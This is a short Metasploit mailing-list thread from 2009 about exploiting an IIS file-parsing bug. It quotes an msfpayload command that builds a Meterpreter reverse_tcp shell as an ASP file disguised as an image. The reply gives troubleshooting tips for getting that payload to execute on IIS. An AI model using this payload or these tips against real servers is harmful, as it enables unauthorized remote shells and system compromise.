Re: Microsoft IIS File Parsing bug

[τ∂υƒιφ * <tas0584 () gmail com>]

Oh! Thanks the ASP extension was not enabled on that system. Point
noted. I also took the 2 kb image this time.

Thanks
TAS!




2009/12/31 HD Moore <hdm () metasploit com>:
> On 12/31/2009 2:08 AM, τ∂υƒιφ * wrote:
> > Hi,
> >
> > I am trying the "Exploiting Microsoft IIS with Metasploit" I read up
> > on https://www.blogger.com/comment.g?blogID=25010298&postID=7822358000167530780&pli=1
> >
> > I have tried the following command
> >
> > ./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8443
> > R | ./msfencode -t asp -o /root/evil.asp
> >
> > This generated the evil.asp. I have also done the cat command and then
> > verified with the file command. I also started the payload handler and
> > verified the settings to ensure I am not making any mistakes.
> >
> > I have two things to ask
> >
> > 1) When I take this evil image and host that on IIS 6.0 I get "Page
> > not found error" , and when I use the same image on IIS 7.0 it
> > actually renders the page. Why is this so?
>
> IIS 7.0 may not have the ASP processor loaded, double check the settings
> (its not on by default). The "404" doesnt make sense, you should at
> least get a 500 if there is an issue.
>
> Something you may want to try is removing the JPG prefix -- some JPG
> files cause the ASP processor to bail before it reaches the ASP script
> itself (using a small file has a better chance).
>
> -HD
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework